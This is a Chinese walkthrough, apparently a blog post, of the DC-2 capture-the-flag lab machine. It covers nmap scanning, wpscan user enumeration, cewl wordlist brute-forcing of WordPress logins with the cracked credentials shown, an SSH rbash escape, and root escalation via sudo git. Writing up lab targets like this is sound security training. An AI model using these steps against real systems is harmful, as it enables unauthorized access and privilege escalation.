DC-2超简便

先用Ifconfig查看自己的IP

后用nmap -sP 192.168。 96.0/24寻找靶机真实ip

信息收集,探端口及服务

nmap -A -p- -v 192.168.96.130

    发现开放了80端口,存在web服务,Apache/2.4.10,

    发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1

访问web站点

http:// 192.168.66.141

可以发现访问不了

发现访问不了,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。

修改hosts文件,添加靶机IP到域名dc-2的指向

vim /etc/hosts

添加后再次访问,访问成功

可以很明显的发现这是一个wordpress的站点

发现flag1

在网页下面我们flag

点进入发现是flag1
大致意思如下:
你通常的单词列表可能不起作用,所以,也许你只是得小心点。
更多的密码总是更好,但有时你就是赢不了他们都是。
以一个身份登录,以查看下一个标志。
如果你找不到它,就以另一种身份登录。

大致意思就是暴力破解,账号密码

做一个目录扫描

dirb http://dc-2/

发现疑似后台地址

访问网址打开之后进入登录界面

发现多个没有什么有用的东西

用户名枚举

前面我们提到这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

    Wpscan一些常用语句:

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

    扫描wordpress版本

wpscan --url http://dc-2

登录页面尝试登录
随即输入用户名密码,提示用户名不存在,

似乎可以进行用户名枚举

 首先来个用户枚举,再尝试利用枚举到的用户爆破密码

wpscan --url http://dc-2 --enumerate u

枚举出三个用户名

admin jerry tom

8、暴力破解出账号密码

根据flag1可以用暴力破解,我们使用cewl生成字典,

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

为了方便大家记录,或者为将来的研究提供参考,Cewl可以将打印出的字典存储为文件。这里可以使用-w参数来将密码字典存储为text文件:

cewl http://dc-2/ -w dict.txt   或者 cewl http://dc-2/ > 1.txt

这里用ls查看创建成功没有

使用wpscan进行暴力破解

wpscan --url http://dc-2 --passwords dict.txt

往下滑找到密码账号

 爆破出来两个账号 

jerry/adipiscing

tom/parturient

登录后台后我们登录tom在tom的家目录发现flag3

jerry/adipiscing

tom/parturient

    登录ssh

ssh tom@192.168.66.141 -p 7744

在tom账号的家目录 发现flag3
cat用不了

接下来,尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642

查看可以使用的命令

echo $PATH

cd进不去目录 使用ls直接查看目录信息

使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

Good to see that you've made it this far - but you " re not home yet .

很高兴看到你走了这么远,但你还没回家。

You still need to get the final flag (the only flag that really counts!!! ).

您仍然需要获得最后的标志(唯一真正重要的标志!)

No hints here 一you're on your own now. :- )

这里没有暗示,一,你现在只能靠自己了。*-)

Go on

继续

git outta here!!!!

大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权

    使用tom用户无权限运行sudo 我们切换到jerry用户

    我们可以看到无需root权限,jerry 可以使用 git

sudo -l  

我们需要先提权

查看一下可以使用的root权限命令

find / -user root -perm -4000 -print 2>/dev/null

jerry用户也不可以直接sudo su

使用git命令进行提取

sudo git help status

提取后whoami

出现root

cd /root后ls查看

cat final-flag.txt

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值